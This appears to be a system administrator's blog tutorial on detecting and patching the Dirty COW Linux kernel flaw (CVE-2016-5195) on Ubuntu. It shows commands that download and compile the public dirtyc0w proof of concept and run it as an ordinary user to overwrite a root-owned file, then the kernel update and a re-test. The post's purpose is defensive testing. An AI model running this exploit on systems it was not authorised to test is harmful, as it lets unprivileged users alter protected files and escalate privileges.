A serious bug named Dirty COW (CVE-2016-5195) was recently detected in the Linux kernel. An unprivileged local user can use this flaw to gain write access to files on the system that the user cannot normally modify. The bug has existed since around 2.6.22+ (released in 2007) and was fixed on Oct 18, 2016. Exploitation of this bug does not leave any trace or log in the system, so it’s difficult to find out what happened if something goes wrong.
The fix has been released, and I have already tested and fixed this bug on my system. You have to update your kernel to fix the problem.
Testing platform
I tested it on the following Ubuntu versions:
12.04.2 LTS (Precise Pangolin), kernel version: Linux 3.5.0-23-generic x86_64
14.04.3 LTS (Trusty Tahr), kernel version: Linux 3.16.0-30-generic x86_64
16.04.1 LTS (Xenial Xerus), kernel version: Linux 4.4.0-21-generic x86_64
How to detect
Let’s see how to detect the flaw. The process is the same on Ubuntu 12.04, 14.04 and 16.04. First, log in to your system as an ordinary user and get the kernel version. gcc must be installed on your system to perform the test. Run the following to get your kernel version.
Ubuntu 12.04
imtiaz@labserver:~$ uname -mrs
Linux 3.5.0-23-generic x86_64
imtiaz@labserver:~$
Ubuntu 14.04
imtiaz@labserver:~$ uname -mrs
Linux 3.16.0-30-generic x86_64
imtiaz@labserver:~$
Ubuntu 16.04
imtiaz@labserver:~$ uname -mrs
Linux 4.4.0-21-generic x86_64
imtiaz@labserver:~$
Write down your kernel version. Now become root and create a file as shown below. The process is the same on Ubuntu 12.04, 14.04 and 16.04.
imtiaz@labserver:~$ sudo -s
[sudo] password for imtiaz:
root@labserver:~#
root@labserver:~# echo Bug in linux kernel > bugfile
root@labserver:~# ls -l
total 4
-rw-r--r-- 1 root root 20 Oct 25 18:23 bugfile
root@labserver:~#
A file called “bugfile” has been created, and its content is “Bug in linux kernel”. You may choose a different name and content for the file. Look at the permissions and ownership of the file. It’s owned by root, so an ordinary user should not be able to make changes to it. Now exit from root and become an ordinary user again. Then download a file from the location mentioned below. You need that file to perform the test. Again, the process is the same on all the Ubuntu versions mentioned.
imtiaz@labserver:~$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
A file called dirtyc0w.c will be downloaded to your system. Compile the file with the command below.
imtiaz@labserver:~$ gcc -pthread dirtyc0w.c -o dirtyc0w
After compiling, you will get a new file called dirtyc0w. Note that it’s an executable file.
imtiaz@labserver:~$ ls -l
total 24
-rw-r--r-- 1 root root 20 Oct 25 21:03 bugfile
-rwxrwxr-x 1 imtiaz imtiaz 13448 Oct 25 21:08 dirtyc0w
-rw-r--r-- 1 root root 2826 Oct 25 21:03 dirtyc0w.c
imtiaz@labserver:~$
Now we come to the main part. Run the file dirtyc0w. It takes two parameters: the first is the name of the file that is going to be changed (in our case “bugfile”), and the second is the string which will replace or be added to the content of that file (r000000000000000000). Run the file and wait for it to finish.
imtiaz@labserver:~$ ./dirtyc0w bugfile r000000000000000000
mmap 7f3b052df000
madvise 0
procselfmem 1900000000
imtiaz@labserver:~$
You will see output like the above (the mmap and procselfmem values may be different in your case). Now check the file named “bugfile” which we created earlier as root.
imtiaz@labserver:~$ cat bugfile
r000000000000000000
imtiaz@labserver:~$
The content of the file, “Bug in linux kernel”, has been replaced by the string “r000000000000000000”. This is the bug. You can change a file owned by root without knowing the root password and without being root. You can write any value into that file: just provide the string you want to write as the second parameter when running dirtyc0w.
How to fix
We have detected that our system is affected, so now it’s time to fix it. The process is simple, but it requires a system reboot, so if downtime is an issue, plan your timing carefully. Before performing the following, please make a backup of the important files on that system, or, if you are in a VM world, make a snapshot of your current system. Then, if things go wrong after updating the kernel, you can revert to your original system. I could update my system kernel without any problem. The fix is simple: just update your system kernel as described below.
Ubuntu 12.04 and 14.04
imtiaz@labserver:~$ sudo apt-get install linux-generic-lts-xenial linux-image-generic-lts-xenial
Ubuntu 16.04
imtiaz@labserver:~$ sudo apt-get update && sudo apt-get dist-upgrade
After the kernel update, reboot your system. Then log in to the system and check the kernel version. You will see the newly installed kernel version:
Ubuntu 12.04
imtiaz@labserver:~$ uname -mrs
Linux 3.5.0-54-generic x86_64
imtiaz@labserver:~$
Ubuntu 14.04 and 16.04
imtiaz@labserver:~$ uname -mrs
Linux 4.4.0-45-generic x86_64
imtiaz@labserver:~$
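The version check above can be scripted for more than one host. The following is an added example, not part of the original post: it classifies a `uname -r` style release string against a baseline table. The function name `dirtycow_kernel_status` and the `BASELINES` table are assumptions; the single entry (4.4.0 series, ABI 45) is taken from the post-update output shown on this page.

```shell
#!/bin/sh
# Added example: classify a kernel release string against a table of
# minimum updated Ubuntu ABI numbers per upstream series.
# BASELINES is an assumption built from this page's "after update" output
# (4.4.0-45-generic); extend it from your distribution's security notices.
BASELINES="4.4.0:45"   # format: upstream-series:minimum-ABI (space separated)

# Print "patched", "needs-update" or "unknown" for a release string
# such as "4.4.0-21-generic" (the format printed by `uname -r`).
dirtycow_kernel_status() {
    release=$1
    series=${release%%-*}      # "4.4.0"
    rest=${release#*-}         # "21-generic"
    if [ "$rest" = "$release" ]; then
        echo unknown           # no ABI field, not an Ubuntu-style release
        return 0
    fi
    abi=${rest%%-*}            # "21"
    case $abi in
        ''|*[!0-9]*) echo unknown; return 0 ;;   # ABI must be numeric
    esac
    for entry in $BASELINES; do
        if [ "${entry%%:*}" = "$series" ]; then
            # ABI numbers are only comparable within the same series.
            if [ "$abi" -ge "${entry##*:}" ]; then
                echo patched
            else
                echo needs-update
            fi
            return 0
        fi
    done
    echo unknown   # series not in the table: consult the vendor advisory
    return 0
}

# Report for the running kernel.
echo "$(uname -r): $(dirtycow_kernel_status "$(uname -r)")"
```

A release string is only a hint, because distributions backport fixes without changing the upstream version; the functional test in the next section is what confirms the result.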
Test the fix
Now perform the following steps:
Step 1: Log in as an ordinary user and become root:
imtiaz@labserver:~$ sudo -s
[sudo] password for imtiaz:
root@labserver:~#
Step 2: Create a file. I use “cleanfile” as the name of the file and “After kernel update” as its content. You can choose your own.
root@labserver:~# echo After kernel update > cleanfile
Step 3: Check the file permissions. Note the permissions and ownership of the file named “cleanfile”. The owner is root, which is what we want.
root@labserver:~# ls -l
total 24
-rw-r--r-- 1 root root 20 Oct 25 2016 bugfile
-rw-r--r-- 1 root root 20 Oct 25 13:16 cleanfile
-rwxrwxr-x 1 imtiaz imtiaz 9158 Oct 25 2016 dirtyc0w
-rw-rw-r-- 1 imtiaz imtiaz 2826 Oct 25 2016 dirtyc0w.c
root@labserver:~#
Step 4: Log out from root:
root@labserver:~# exit
exit
imtiaz@labserver:~$
Step 5: Run the dirtyc0w file with two arguments, the file name and the replacement string:
imtiaz@labserver:~$ ./dirtyc0w cleanfile c0000000000000000000
mmap 7f17c88b4000
madvise 0
procselfmem 2000000000
imtiaz@labserver:~$
Step 6: Check the content of the file.
imtiaz@labserver:~$ cat cleanfile
After kernel update
imtiaz@labserver:~$
As you can see, the content of the file has not changed, which is the normal behavior. In other words, you have just fixed the Dirty COW issue on your system. Perform all the steps carefully, and make a backup before you begin.
About the Author: Imtiaz works in a financial organization in Bangladesh and has experience in system, network and security administration. Feel free to contact him on LinkedIn or Twitter.